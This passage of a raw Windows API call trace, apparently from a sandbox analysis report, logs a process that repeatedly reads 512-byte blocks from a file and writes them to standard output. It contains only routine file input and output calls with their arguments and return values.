lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.650] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.650] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.650] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.650] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] GetFileType (hFile=0x50) returned 0x1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] GetFileType (hFile=0x50) returned 0x1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] GetFileType (hFile=0x50) returned 0x1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] GetFileType (hFile=0x50) returned 0x1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] GetFileType (hFile=0x50) returned 0x1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] GetFileType (hFile=0x50) returned 0x1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] GetFileType (hFile=0x50) returned 0x1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, 
lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] GetFileType (hFile=0x50) returned 0x1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.651] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.651] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.651] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.651] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] GetFileType (hFile=0x50) returned 0x1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] GetFileType (hFile=0x50) returned 0x1 [0133.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.651] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] GetFileType (hFile=0x50) returned 0x1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] GetFileType (hFile=0x50) returned 0x1 [0133.652] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] GetFileType (hFile=0x50) returned 0x1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] GetFileType (hFile=0x50) returned 0x1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] GetFileType (hFile=0x50) returned 0x1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.652] GetFileType (hFile=0x50) returned 0x1 [0133.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.653] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.653] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.653] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.653] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] GetFileType (hFile=0x50) returned 0x1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] GetFileType (hFile=0x50) returned 0x1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] GetFileType (hFile=0x50) returned 0x1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] GetFileType (hFile=0x50) returned 0x1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] GetFileType (hFile=0x50) returned 0x1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, 
lpOverlapped=0x0) returned 1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] GetFileType (hFile=0x50) returned 0x1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] GetFileType (hFile=0x50) returned 0x1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.653] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.653] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] GetFileType (hFile=0x50) returned 0x1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.654] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.654] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.654] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.654] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] GetFileType (hFile=0x50) returned 0x1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] GetFileType (hFile=0x50) returned 0x1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] WriteFile (in: hFile=0x50, 
lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] GetFileType (hFile=0x50) returned 0x1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] GetFileType (hFile=0x50) returned 0x1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] GetFileType (hFile=0x50) returned 0x1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] GetFileType (hFile=0x50) returned 0x1 [0133.654] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.654] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] GetFileType (hFile=0x50) returned 0x1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] GetFileType (hFile=0x50) returned 0x1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.655] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.655] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.655] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.655] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] GetFileType (hFile=0x50) returned 0x1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] GetFileType (hFile=0x50) returned 0x1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] GetFileType (hFile=0x50) returned 0x1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 
[0133.655] GetFileType (hFile=0x50) returned 0x1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] GetFileType (hFile=0x50) returned 0x1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] GetFileType (hFile=0x50) returned 0x1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.655] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] GetFileType (hFile=0x50) returned 0x1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] GetFileType (hFile=0x50) returned 0x1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.656] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.656] SetFilePointerEx (in: 
hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.656] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.656] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] GetFileType (hFile=0x50) returned 0x1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] GetFileType (hFile=0x50) returned 0x1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] GetFileType (hFile=0x50) returned 0x1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] GetFileType (hFile=0x50) returned 0x1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] GetFileType (hFile=0x50) returned 0x1 [0133.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.656] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: 
lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.657] GetFileType (hFile=0x50) returned 0x1 [0133.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.657] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.657] GetFileType (hFile=0x50) returned 0x1 [0133.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.657] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.657] GetFileType (hFile=0x50) returned 0x1 [0133.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.657] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.657] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.657] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.657] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.657] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.657] GetFileType (hFile=0x50) returned 0x1 [0133.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.657] GetFileType (hFile=0x50) returned 0x1 [0133.657] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0133.657] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.657] GetFileType (hFile=0x50) returned 0x1 [0133.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.657] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.658] GetFileType (hFile=0x50) returned 0x1 [0133.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.658] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.658] GetFileType (hFile=0x50) returned 0x1 [0133.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.658] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.658] GetFileType (hFile=0x50) returned 0x1 [0133.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.658] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.658] GetFileType (hFile=0x50) returned 0x1 [0133.658] _get_osfhandle (_FileHandle=1) returned 0x50 
[0133.658] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.658] GetFileType (hFile=0x50) returned 0x1 [0133.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.658] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.658] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.658] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.659] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.659] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.659] GetFileType (hFile=0x50) returned 0x1 [0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.659] GetFileType (hFile=0x50) returned 0x1 [0133.659] _get_osfhandle (_FileHandle=1) returned 0x50 